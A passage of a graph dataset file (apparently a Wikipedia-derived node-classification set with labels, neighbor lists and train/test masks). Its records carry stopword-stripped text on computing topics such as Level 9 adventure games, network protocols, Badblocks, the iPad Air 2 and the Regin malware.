cities also launching probes survey ships space earth received news habitable planet third final part done ten giant passenger discs carrying two hundred thousand colonists stasis towed space next came engine unit linked front discs colony ship completed ready go 2190s fifty colony ships launched eec ceres base among snowball 9 carried first colonists planet eden eridani system next three years accelerator chains beyond pluto fired ten-ton blocks ammonia ice travelling ship snowball 9 caught ice blocks hooks piled around passenger discs forming hollow shell would cover ship would serve shield needed fuel fusion engines later part trip ice shell gave snowball series name receiving last ice block crew put ship autopilot went hibernate passengers leaving ship maintenance robots except brief period activity start deceleration crew slept trip awaking one year reaching eden plan continue deceleration consuming last ice shell put ship orbit around planet delivering passengers gliders would retrieved hooks reused protagonist two first instalments kim kimberley tall athletic intelligent woman brown eyes fair hair born raised hampstead crèche closed thirteen years old due violations android protection acts finished education milton keynes school life malta returned england national service started standard security work occasional surveillance subversive members society ended working counter-espionage agent whilst mid-twenties kim accepted travel undercover snowball 9 last resort worst-case scenario snowball 9 approaches eden something goes wrong crew member murders shipmates destroys communication system sets ship collision course sun robots little automata continue everyday operations oblivious danger ship computer capable thinking awakens kim kimberley deranged crew member destroys exits modified stasis chamber goal finding way reach control room avert disaster snowball originally released 1983 company fourth adventure game using a-code system nick mike pete austin headed development though level 9 previous games featured fantasy theme austin brothers chose science fiction theme original release used version 1 system initially released bbc micro sinclair zx spectrum nascom later followed versions commodore 64 camputers lynx oric-1 atari 8-bit well memotech mtx amstrad cpc enterprise msx noteworthy including seven thousand locations achieve sixty-eight hundred locations passenger disks form colour-coded maze minimal descriptions another peculiar aspect game confusion behind main character gender interview sinclair user chris bourne asked androgynous kim man woman pete austin pointed credit end design 'ms kimberley costume also admitted kim kimberley deliberately unisex name debate came end release return eden made explicit kim man surviving crew members confuse woman tried destroy ship snowball 9 orbiting eden surviving crew members put kim trial evidence mempak control room shows hijacker rather saviour despite fact recording damaged thus unreliable sentence death thrown space kim manages escape aboard stratoglider hour later lands eden point game starts first thing player must find shelter kim moves game snowball 9 crew use ship engine try burn native robots take proof snowball 9 ship expecting hostile alien craft must destroy objective contact robots time ends snowball 9 everyone aboard unlike predecessor return eden two hundred fifty locations level 9 first game feature graphics adventure games included graphics version 2 a-code system allowed level 9 encode location graphics little forty bytes size made possible add graphics every location game formats 32 k ram user could choose display play game text-only mode released platforms predecessor game first cover depicted robot fighting monster plant enoch robot resembled comic book character avoid legal troubles level 9 commissioned godfrey dowson new cover dowson illustration depicted another robot jungle looking towards enoch level 9 satisfied result asked dowson liked third cover much hired dowson artwork re-release old games well future titles pete austin commented game alien theme park gone wild eden universe like larry niven future space ... intended comment superpower intervention third world hundred years arrival colonists aboard snowball 9 planet eden become home half billion people paradise managed robots crime taxes unemployment freedom population lives domed megapolis perhaps due war occurred return eden contact cities surrounding natural world occasional sighting flying saucers keeps population afraid going outside main character nameless citizen enoch starts game beautiful garden everything seems fine picks apple tree worm pops player follows outside garden desert awakens simulation one many forms entertainment available reign third kim garden eden prison allegory sets mood entire game objective explore city player must gather clues unmask government conspiracy behind flying saucers worm paradise third final instalment silicon dreams trilogy departure previous games evolved alongside 12 month enhancement level 9 adventure system standard features include 1,000 word vocabulary highly-advanced english input memory-enhancing text compression familiar much appreciated type-ahead multi-tasking player need never wait picture drawn first game using version 3 a-code system released four fewer platforms excluding lynx memotech mtx nascom oric-1 compared two previous releases another difference player seven days within game clock complete game quests also time-based require player arrive certain locations specific hours achieve desired goal game play remains backdrop longer action adventure political thriller resembles novel nineteen eighty-four similar happened snowball released certain confusion main character identity time story set level 9 fact sheet says ... couple years later kim kimberley become legend eden another article stated worm paradise set 100 years later kim kimberley iii ... furthermore pete austin said worm set eden 50 years future player kim becomes mayor runs place notice sources termed game original name worm paradise silicon dreams second title published telecomsoft first jewels darkness four-game publishing deal signed level 9 april 1986 deal gave level 9 often referred british infocom opportunity revise previous titles add support 16-bit market well possible entry potential lucrative us market subsequently trilogy released total twelve platforms leaving bbc micro enterprise compared worm paradise adding support apple ii amiga amstrad pcw atari st ibm pc dos macintosh games updated version 3 a-code system updated text new graphics inclusion release silicon dreams trilogy 1986 expanded text-only versions releases rainbird release came 215 x 153 x 27 mm cardboard box firebird release came 227 x 163 x 30 mm black plastic box featured 150 x 210 mm 68-page booklet loading instructions guide playing game peter mcbride novella eden song served introduction worm paradise novella also used copy protection device upon restore saved game player enter word page line reference although adventure game released sinclair ql called return eden written oliver neef rich mellor written level 9 game name level 9 never released version trilogy sinclair ql games released individually generally received good initial reviews snowball best text-only adventure prize crash 1984 readers awards return eden received 90 score sinclair programs worm paradise rated sinclair megagame sinclair user classic trilogy released received unanimously good reviews zx spectrum press sinclair user gave sinclair user classic terming ... unqualified success level 9 rainbird sinclair awarded sinclair mega game zx computing monster hit commodore 64 magazine zzap 64 gave 90 score awarded zzap 64 sizzler however reviews found graphics ... truly abysmal blotchy often unrecognisable ... simple design ... others called ... smidgens better added jewel darkness possibly even two smidgens far disappointment zx spectrum version placed fourth september third october 1987 sinclair adventure charts",
    "neighbors": [
      8840,
      2345,
      9006,
      9714,
      5395,
      4375,
      8413
    ],
    "mask": "Train"
  },
  {
    "node_id": 8647,
    "label": 9,
    "text": "Pantalk:pantalk pantalk interpreted cross-platform programming language developed early 1980s cojyp hyperpanel lab use canal plus mediahighway interactive tv platform embedded environments pantalk created take much less development time compared java avoiding kid candyshop effect plenty rich language structures may practice serious limitations prevent taken serious computer language outside limited mediahighway digital tv platform outpaced ubiquitous javascript based liberate c based opentv platforms pantalk partially tokenised interpreted language structured code written plain text *.isb files precompiled *.isc files *.isc files compiled bytecode p-code *.isu files features subset simpler control structures operators variable types statements expect compiled interpreted language also features example variables declaration global across whole applications memory allocation management graphics widgets misses basics like data structures subroutines functions outside loading new tokenised file apart system api feels like old style basic variables global pantalk manages single scalar variables multidimensional arrays available types integer real alpha alphanu date time text memory variable written *.clb files precompiled *.cla files *.cla files compiled bytecode p-code *.clu files reads like hybrid 8-bit microcomputer basic pascal working time developers frustrated lack consistency many limitations said 8-bit basic interpreters pantalk script header script name require return end statement end procedure many statements must end semi colon depending certain api areas always two types script panel script also called dependent script independent script panel script panel group graphical objects named widgets graphical object also called widget trigger one several scripts widget invokes script script must panel script panel script invoke types script panel independent script named panel script stored library panel scripts independent script independent script invoked scripts module boot sequence independent script invoke panel script calling script script path must specified path specifies script location module script library pertains",
    "neighbors": [
      5395,
      8868,
      5677,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 8648,
    "label": 5,
    "text": "Hypertext_caching_protocol:hypertext caching protocol hypertext caching protocol abbreviated htcp used discovering http caches cached data managing sets http caches monitoring cache activity permits full request response headers used cache management expands domain cache management include monitoring remote cache additions deletions requesting immediate deletions sending hints web objects third party locations cacheable objects unavailability web objects multi-octet htcp protocol elements transmitted network byte order reserved fields set binary zero senders left unexamined receivers headers must presented crlf line termination http hostnames specified compatible sender receiver private naming scheme hosts.txt nis use names depending schemes sent htcp neighbors known participate said schemes raw addresses dotted quad ipv4 colon-format ipv6 universal public dns names use private names addresses require special operational care udp must supported htcp agents must isolated network failures delays htcp agent prepared act useful ways response forthcoming responses delayed reordered damaged tcp optional expected used protocol debugging iana assigned port 4827 standard tcp udp port number htcp htcp message following general format",
    "neighbors": [
      4797,
      2887,
      7965,
      10924,
      6894,
      11413,
      2934,
      5724,
      5469,
      5470,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8649,
    "label": 3,
    "text": "Automotive_Network_Exchange:automotive network exchange anxebusiness corp. anx company owns operates automotive network exchange anx large private extranet connects automotive suppliers automotive manufacturers since 2006 anx expanded areas provides managed security compliance connectivity solutions businesses healthcare retail automotive sectors automotive network exchange private extranet initially set maintained automotive industry action group telcordia general motors ford chrysler built private network auto industry 1995 provide consistent reliable speed guaranteed security data transmissions automakers suppliers anx network allows trading partners collaborate electronically product design development solicit process orders facilitate just-in-time manufacturing post shipping schedules 1999 automotive industry action group sold anx network science applications international corporation saic overseer anx network became anx next six years 4,000 companies joined anx network making one largest extranets world 2006 private equity firm one equity partners acquired anxebusiness saic automotive industry heavily dependent collaboration manufacturers suppliers entities act federated virtual companies critical materials parts components services high velocity supply chains imperative success virtual companies must flexible accommodate needs virtual automotive manufacturer enabling formation “ many-to-many ” relationships trading partners simultaneously subscribe multiple model programs opt situation dictates anx network designed built operated deliver highly secure collaboration strategic business partners anx network secure private network uses standard open internet protocols carries traffic private lines leased various carriers ipsec end-to-end encryption anx network provides secure service customers like typical vpn ’ different typical vpn routers make network check every packet make sure comes ip address private network thus nobody customers get network triple des encryption protects customer ’ data potential malicious behavior another customer",
    "neighbors": [
      8649,
      245,
      3742
    ],
    "mask": "Test"
  },
  {
    "node_id": 8650,
    "label": 3,
    "text": "Ingrid's_Back:ingrid back gnome ranger ii ingrid back text adventure game level 9 released 1988 sequel gnome ranger game standard text adventure limited graphics platforms short novella peter mcbride included 2nd gnettlefield journal explaining background story providing hints play returned holiday wilderness gnome ingrid bottomlow must save home village little moaning destruction greedy property developer jasper quickbuck must get various uncooperative inhabitants village sign petition gameplay similar gnome ranger player must explore ingrid village collecting signatures petition interacting various non-player characters",
    "neighbors": [
      9006,
      9166,
      8542
    ],
    "mask": "None"
  },
  {
    "node_id": 8651,
    "label": 6,
    "text": "Badblocks:badblocks badblocks linux utility check bad sectors disk drive creates list sectors used programs like mkfs used future thus cause corruption data part e2fsprogs project port available bsd operating systems run standalone program badblocks gives list blocks problems makes good option checking whether disk drive healthy independent smart data file system checks common use case invocation badblocks part e2fsck passing option codice_1 scan bad blocks prevent data stored blocks done adding list found bad blocks bad block inode prevent affected sectors allocated file directory test done using read-only codice_1 non-destructive read-write codice_3 test method running codice_4 display list bad blocks recorded codice_5 codice_6 badblocks -nvs /dev/sdb would check drive sdb non-destructive read-write mode display progress writing block numbers checked would check sixth partition drive sdb destructive read-write mode -w write-mode writes 4 different patterns whole partition verifies reading back displays progress writing block numbers checked -s show -v verbose data partition overwritten block level entire drive block size 4096 destroys mbrs partitions data alike modern disk drives probably show defective sectors silently remap bad sectors spare tracks running program new drive several days test whole surface reading afterwards s.m.a.r.t data eventually show reallocated sectors using codice_7 option device containing existing file system erases data device",
    "neighbors": [
      7136,
      8298,
      7983,
      5106,
      8306,
      823,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 8652,
    "label": 7,
    "text": "Fragmented_object:fragmented object fragmented objects truly distributed objects novel design principle extending traditional concept stub based distribution contrast distributed objects physically distributed encapsulate distribution object parts object named fragments may exist different nodes provide object interface client accessing fragmented object unique object identity presumes local fragment fragmented objects may act like rpc-based infrastructure caching smart proxy well therefore clients distinguish access local object local stub local fragment full transparency gained following characteristics fragmented objects arbitrary protocols may chosen internal communication fragments instance allows hide real-time protocols e.g. rtp media streaming behind standard corba interface internal structure fragmented object arranged object developer/deployer may client–server hierarchical peer-to-peer others thus downward compatibility stub based distribution ensured distribution state functionality hidden behind object interface respective distribution fragments also arbitrary addition application using fragmented object also tolerate change distributions achieved exchanging fragment one multiple hosts procedure either triggered user changes object properties fragmented object collectivity fragments e.g. fragment considered failed course exchange request may trigger one internal changes object developer migrate state functionality fragments providing different fragment implementations dynamically change inside fragmented objects flexible internal partitioning achieved providing transparent fault-tolerant replications well",
    "neighbors": [
      8640,
      9441,
      2980
    ],
    "mask": "Test"
  },
  {
    "node_id": 8653,
    "label": 5,
    "text": "Realtek_Remote_Control_Protocol:realtek remote control protocol realtek remote control protocol rrcp developed realtek application layer protocol running directly ethernet frames main idea behind protocol allow direct access ethernet switch controller internal register ethernet network approach allows avoid cost including processor ram flash memory etc managed ethernet switch instead intelligence targeted reside nearby computer running special rrcp-aware ethernet switch management software packets transmitted ethernet frames ethertype 0x8899 details rrcp protocol listed datasheets chipsets rrcp support rtl8324bp rtl8326 used initiate scan rrcp-capable switches network segment fetch parameters sent rrcp-capable switch response valid hello packet contains parameters ids mac addresses used fetch value internal switch controller register sent rrcp-capable switch response valid get packet contains requested register number value read used set internal switch controller register certain value contains register number value written register acknowledgment generated switch part rrcp protocol closely associated underlying mechanism simplified spanning tree protocol substitute rrcp-capable switch controllers part rrcp protocol closely associated underlying mechanism layer-2 analog icmp echo request type 8 message rrcp-capable switch controllers part rrcp protocol closely associated underlying mechanism layer-2 analog icmp echo reply type 0 message rrcp-capable switch controllers currently rrcp protocol officially working realtek rtl8316bp rtl8318p rtl8324p switch controller chips unofficially also found working rtl8316b rtl8324 rtl8326 rtl8326s",
    "neighbors": [
      842,
      5402,
      2292
    ],
    "mask": "None"
  },
  {
    "node_id": 8654,
    "label": 2,
    "text": "Routing_and_Remote_Access_Service:routing remote access service routing remote access service rras microsoft api server software makes possible create applications administer routing remote access service capabilities operating system function network router developers also use rras implement routing protocols rras server functionality follows builds upon remote access service ras windows nt 4.0 rras introduced windows 2000 offered download windows nt 4.0 routing services remote access services used work separately point-to-point protocol ppp protocol suite commonly used negotiate point-to-point connections allowed combined rras used create client applications applications display ras common dialog boxes manage remote access connections devices manipulate phone-book entries routing remote access service management pack helps network administrator monitor status availability computers running windows server 2008 r2",
    "neighbors": [
      5472,
      5761,
      9442,
      1411,
      10144,
      1030,
      2087,
      3751,
      3752,
      4490,
      10058,
      2509,
      3629,
      7983,
      8432,
      3250,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 8655,
    "label": 1,
    "text": "Australian_National_Shipwreck_Database:australian national shipwreck database australian national shipwreck database online searchable database 7,000 known shipwrecks located around coast australia within inland waters originally developed australasian institute maritime archaeology maintained department environment",
    "neighbors": [
      301
    ],
    "mask": "None"
  },
  {
    "node_id": 8656,
    "label": 4,
    "text": "Alan_Sherman:alan sherman alan theodore sherman born february 26 1957 full professor computer science umbc director umbc center information security assurance cisa director umbc chess program sherman editor cryptologia member phi beta kappa sigma xi sherman earned bachelor degree mathematics brown university 1978 master degree electrical engineering computer science mit 1981 ph.d. degree computer science mit 1987 professor sherman research interests include security voting systems cryptology information assurance discrete algorithms sherman faculty advisor umbc chess club since 1991 playing student vs. faculty match recruits chess players worldwide academic scholarships umbc ranked among best college teams winning pan american intercollegiate team chess championship 1996 1998 1999 2000 2001 2002 2005 2008 2009 2012 1997 received meritorious service award uscf contributions college chess",
    "neighbors": [
      7979,
      2558,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 8657,
    "label": 4,
    "text": "V-Key:v-key v-key software-based digital security solutions provider headquartered singapore provides back-end front-end solutions financial institutions mobile payment providers governments implement cloud-based payments authentication mobile banking secured mobile applications user access data protection v-key founded 2011 entrepreneur eddie chau benjamin mah joseph gan.eddie chau also formed digital agency brandtology acquired isentia 2014 started v-key primarily secure mobile devices applications patented technology benjamin mah co-founder chief executive officer v-key general manager e-cop acquired wholly owned subsidiary temasek holdings regional director encentuate acquired ibm co-founded v-key concurrently venture partner venture craft chairman jumpstart asia mentor uob finlabs joseph gan third co-founder v-key joining v-key centre strategic infocomm technologies csit head cryptography lab oversaw research development cryptographic solutions ministry defence singapore companies funded v-key ipv capital ant financial services runs alipay mobile wallet app v-key provides security solutions businesses support cloud-based payments digital identity authentication mobile banking well secured mobile applications via core technology—v-os v-os virtual secure element globally patented certified industry bodies including info-communications media development authority singapore imda national institute standards technology fips 140-2 validation united states technology provides secure data transmission solution used encrypted communications mobile soft token replace hardware tokens well mobile authentication solutions v-key partners financial institutions governments mobile payment providers various markets technology used v-key received following awards",
    "neighbors": [
      420,
      10918,
      9356,
      3629,
      11244,
      5433,
      3323,
      5404
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8658,
    "label": 1,
    "text": "PastPerfect_Museum_Software:pastperfect museum software pastperfect museum software application collections archiving designed museums may used various institutions including libraries archives natural history collections pastperfect allows database storage artifacts documents photographs library books pastperfect utilized 9000 museums nationwide pastperfect introduced 1998 primary product pastime software company inc released version 2 later year updated version three 2001 version four 2004 updated version five 2010 remains current edition program pastime software company eventually changed name pastperfect software inc. 2007 pastperfect operates four basic catalogs sorting collections material archive catalog storing documents photograph catalog storing photos tintypes paintings etc objects catalog storing three-dimensional artifacts library catalog storing books would included institution library images uploaded catalog multiple photos per record also stores donor information automatically generates deed gift forms thank letters upon completing certain steps accessioning process certain extensions allow inclusion oral history records transcripts additional online function allows institutions digitize collections make free browse internet pastperfect also contains contact list function storing donors members employee contact information similar catalog format rest program",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8659,
    "label": 2,
    "text": "Windows_Easy_Transfer:windows easy transfer windows easy transfer specialized file transfer program developed microsoft allows users windows operating system transfer personal files settings computer running earlier version windows computer running newer version windows easy transfer introduced windows vista included windows 7 windows 8 windows 8.1 operating systems replaces files settings transfer wizard included windows xp offers limited migration services computers running windows 2000 service pack 4 windows xp service pack 2 transfer applications files settings windows easy transfer discontinued windows 10 microsoft partnered laplink provide free version pcmover express alternative limited time. ref name= laplink/microsoft /ref end users also ability upgrade pcmover professional paid version allows transfer applications well windows 2000 microsoft developed user state migration tool command line utility allowed users windows 95 windows 98 windows nt 4.0 migrate data settings newer operating system command-line tool provide graphical user interface additional migration tool titled files settings transfer wizard developed windows xp fstw designed assist users operating system migrating data settings windows 98 windows fstw could launched windows xp cd-rom presented options transfer data settings via direct cable connection 3.5-inch floppy zip disk network connection moreover option create wizard disk available could used initiate migration process earlier system preliminary version windows easy transfer demonstrated windows hardware engineering conference jim allchin 2004 successor files settings transfer wizard scheduled next client version windows operating system windows vista known windows longhorn final release version application intended optionally use specialized usb cable transfer data personal computers supported versions windows easy transfer transfer transferring windows versions later windows 2000 windows 8.1 easy transfer longer export data another computer still open files created earlier version windows windows easy transfer support transferring installed applications transferring certain supported applications windows xp windows vista microsoft planned release supplementary windows easy transfer companion application application remained perpetual beta development final version never released several transfer methods used windows easy transfer support migration 64-bit 32-bit system since windows vista windows support incoming connections serial parallel irda port operating system support incoming connections ethernet wireless lan hpna windows 8.1 windows easy transfer import settings windows 7 windows 8 windows rt another windows 8.1 computer windows vista transfer method supported windows 8.1 saved archive usb drive method transfers easy transfer cable network connection supported",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2095,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      3170,
      617,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      3250,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      8920,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      780,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      3496,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      9173,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 8660,
    "label": 7,
    "text": "MVaaS:mvaas mvaas acronym managed video service refers systems architecture used companies provide enable video monitoring services allow customers easily manage large numbers digital video recorders dvrs network video recorders nvrs scalable video monitoring architecture information customer ’ physical locations video recorders cameras locations customer ’ users must stored central database traditional architecture customer responsible hosting database mvaas architecture database managed video monitoring provider customer customer interacts database video recorders using website also managed video monitoring provider customer freed details hosting database web site information sometimes said “ cloud ” indeed term mvaas intentionally similar common term saas software service term managed video refers fact architecture customer ’ video remains video recorders customer premises stored central database central database holds information mediates access video important maintaining configuring video recorders contain video ensures customer always ultimate control video frees customer video monitoring company continuously consume bandwidth transfer video video recorders central database mvaas architecture additional information may stored central database besides information video recorders users example video monitoring company may store observations comments camera log camera monitored alternative mvaas hosted video service hvaas architecture like mvaas except customer ’ video physically stored central database customers prefer allows simplify video recorders premises",
    "neighbors": [
      4194,
      467,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 8661,
    "label": 2,
    "text": "FLASK:flask flux advanced security kernel flask operating system security architecture provides flexible support security policies joint venture national security agency university utah secure computing corporation project designed provide framework secure operating system development implementation started mach microkernel since shifted focus linux operating system flask core framework security-focused operating systems nsa security-enhanced linux selinux opensolaris fmac trustedbsd means selinux thought implementation flask",
    "neighbors": [
      11363,
      7561,
      9646,
      7887,
      7983,
      7187,
      823,
      9817,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8662,
    "label": 2,
    "text": "IPad_Air_2:ipad air 2 ipad air 2 second-generation ipad air tablet computer designed developed marketed apple inc announced october 16 2014 alongside ipad mini 3 released october 22 2014 ipad air 2 thinner faster predecessor ipad air features touch id height screen size ipad air ipad air 2 discontinued march 21 2017 successor 2019 ipad air released march 18 2019 ipad air 2 announced keynote october 16 2014 first ipad feature touch id theme keynote way long air 2 began arriving retail stores october 22 2014 slogan device change air release new ipad pro slogan device changed light heavyweight ipad air 2 ships ios 10 formerly ios 8 later ios 9 operating system pre-installed includes version apple pay in-store nfc functionality removed included touch id sensor allows user pay items online without needing enter user card details ios 10 comes several built-in applications camera photos messages facetime mail music safari maps siri calendar itunes store app store notes contacts ibooks home reminders clock videos news photo booth podcasts apple app store digital application distribution platform ios allows users browse download applications made various developers itunes store additional apps made apple available free download imovie garageband itunes u find iphone find friends apple store trailers remote iwork apps pages keynote numbers like ios devices ipad air 2 also sync content data mac pc using itunes although tablet designed make phone calls cellular network place receive phone calls iphone cellular connection using apple continuity feature supported ios 8 later versions ios os x yosemite later versions macos using voip application skype june 8 2015 announced wwdc ipad air 2 would support ios 9 new features released q3 2015 air 2 users ios 9 able use slide picture picture split view slide allows user slide second app side screen smaller window display information alongside initial app picture picture allows user watch video small resizable moveable window remaining another app split view allows user run two apps simultaneously 50/50 view ipad air 2 inherits hardware similar iphone 6 iphone 6 plus major change processor apple a8x high-end 3-core variant apple a8 ipad air 2 2 gb ram making ipad air 2 first ios device 1 gb ram powervr gpu 8 cores also uses apple m8 motion co-processor barometer first generation ipad inherit fingerprint touch id sensor iphone addition compared ipad air includes improved 8-megapixel 3264×2448 rear-facing camera 10 fps burst mode slow motion video 120 fps similar iphone 5s camera capabilities front-facing facetime hd camera also improved larger ƒ/2.2 aperture allows 81 light image apple added gold option existing silver space gray color choices ipad air 2 previous existing colors used preceding ipad air unlike ipad predecessors mute/orientation lock switch removed accommodate reduced depth instead user must use control center access functions slightly smaller battery compared ipad air although apple claims 10-hour battery life ipad air 2 available 16 32 64 128 gb storage options storage expansion options apple released camera connection kit sd card reader used transfer photos videos ipad verge called air 2 best tablet ever made giving score 9.3 10 noting offered iterative improvement missed opportunities design",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      1832,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 8663,
    "label": 3,
    "text": "Disk_NG:disk ng disk ng series two namco video game compilations msx released japan compilations five ports namco arcade games exclusive game released march 9 1990 released april 26 1990",
    "neighbors": [
      11522,
      1060,
      9093,
      2540,
      9516,
      8942,
      9006,
      10287,
      10544,
      5717,
      3039
    ],
    "mask": "None"
  },
  {
    "node_id": 8664,
    "label": 4,
    "text": "Regin_(malware):regin malware regin also known prax qwerty sophisticated malware hacking toolkit used united states national security agency nsa british counterpart government communications headquarters gchq first publicly revealed kaspersky lab symantec intercept november 2014 malware targets specific users microsoft windows-based computers linked us intelligence gathering agency nsa british counterpart gchq intercept provided samples regin download including malware discovered belgian telecommunications provider belgacom kaspersky lab says first became aware regin spring 2012 earliest samples date 2003 name regin first found virustotal website 9 march 2011 among computers infected worldwide regin 28 percent russia 24 percent saudi arabia 9 percent mexico ireland 5 percent india afghanistan iran belgium austria pakistan kaspersky lab recently discovered multiple attack vectors used usb bios modification allows bulk malware injected ports 1,2,3 5 many extra services processes visible victim 'back room creators finds collisions sha2 message digests suggesting lot cpu time taken virus-software updates slightly altered updates per user e.g 256 bytes random data collisions every user would carried kaspersky said malware main victims private individuals small businesses telecom companies regin compared stuxnet thought developed well-resourced teams developers possibly western government targeted multi-purpose data collection tool according die welt security experts microsoft gave name regin 2011 cunning norse dwarf regin regin uses modular approach allowing load features exactly fit target enabling customized spying design makes highly suited persistent long-term mass surveillance operations targets regin stealthy store multiple files infected system instead uses encrypted virtual file system evfs entirely contained within looks like single file innocuous name host within files identified numeric code name evfs employs variant encryption rarely used rc5 cipher regin communicates internet using icmp/ping commands embedded http cookies custom tcp udp protocols command control server control operations upload additional payloads etc symantec says kaspersky identified malware backdoor.regin antivirus programs including kaspersky october 2015 identify sample regin released intercept malware 9 march 2011 microsoft added related entries malware encyclopedia later two variants regin.b regin.c added microsoft appears call 64-bit variants regin prax.a prax.b microsoft entries technical information kaspersky symantec published white papers information learned malware german news magazine der spiegel reported june 2013 us intelligence national security agency nsa conducted online surveillance european union eu citizens eu institutions information derives secret documents obtained former nsa worker edward snowden der spiegel intercept quote secret 2010 nsa document stating made cyberattacks year without specifying malware used eu diplomatic representations washington d.c. representations united nations signs identifying software used regin found investigators infected machines intercept reported 2013 uk gchq attacked belgacom belgium largest telecommunications company attacks may led regin coming attention security companies based analysis done security firm fox der spiegel reported november 2014 regin tool uk usa intelligence agencies fox found regin computers one customers according analysis parts regin mentioned nsa ant catalog names straitbizarre unitedrake fox name customer der spiegel mentioned among customers fox belgacom cited head fox ronald prins stated allowed speak found belgacom network december 2014 german newspaper bild reported regin found usb flash drive used staff member chancellor angela merkel checks high-security laptops german chancellery revealed additional infections regin used october november 2018 hack research development unit yandex",
    "neighbors": [
      1024,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      7809,
      5764,
      2187,
      6797,
      4240,
      11413,
      1688,
      2717,
      9375,
      10924,
      7855,
      9904,
      9395,
      8886,
      10952,
      3789,
      7887,
      4304,
      7893,
      4314,
      8410,
      9435,
      3807,
      5349,
      1254,
      10477,
      9460,
      2815,
      3843,
      10502,
      4883,
      10003,
      5402,
      3867,
      7965,
      2857,
      8489,
      11052,
      9518,
      1337,
      11583,
      6484,
      857,
      1882,
      7515,
      9569,
      4462,
      3956,
      9082,
      11152,
      10132,
      9630,
      1440,
      5024,
      3495,
      11175,
      5547,
      1970,
      441,
      1979,
      4027,
      1994,
      4054,
      9688,
      1504,
      9186,
      2542,
      4595,
      8692,
      507
    ],
    "mask": "None"
  },
  {
    "node_id": 8665,
    "label": 3,
    "text": "Macintosh_Quadra_605:macintosh quadra 605 macintosh quadra 605 also sold macintosh lc 475 macintosh performa 475 personal computer designed manufactured sold apple computer inc. october 1993 july 1996 model names reflect decision made apple 1993 follow emerging industry trend naming product families target customers quadra business lc education performa home accordingly performa 475 476 sold department stores electronics stores circuit city whereas quadra purchased authorized apple reseller introduced quadra 605 least expensive new computer apple lineup performa 410 introduced time price 1,000 usd included monitor based much older macintosh lc ii 16 mhz 68030 processor quadra 605 reuses macintosh lc iii pizza box form factor minor modifications quadra 605 discontinued october 1994 lc 475 variant continued sold schools july 1996 apple offered direct replacement machines making final macintosh use lc lightweight slim-line form factor apple would release another desktop computer mac mini nearly ten years later models come standard 68lc040 cpu running 25 mhz 4 mb ram board 512 kb vram expandable 1 mb 1 lc iii-style processor direct slot 1 adb 2 serial ports external scsi port manual-inject floppy drive introduced october 18 1993 introduced october 21 1993 central processing unit 25 mhz mc68lc040 32-bit bus 8 kb on-chip l1 cache divided 4 kb data 4 kb instruction cache caches although l2 cache possible via lc pds card 68lc040 replaced 68040 includes onboard floating point unit approximately triple speed floating point operations random access memory 4 mb motherboard one 72-pin simm socket 80 ns faster simms official supported maximum ram 36 mb one 32 mb 72-pin simm plus 4 mb motherboard larger simms work—up 128 mb may used limits ram type physical limits might apply side simm facing cpu thicker chips clips simm socket close around automatically possible manually push clips enough hold simm place djmemc memory controller used quadra 605 predecessors quadra/centris 610 quadra/centris 650 quadra 800 recognize simms 32 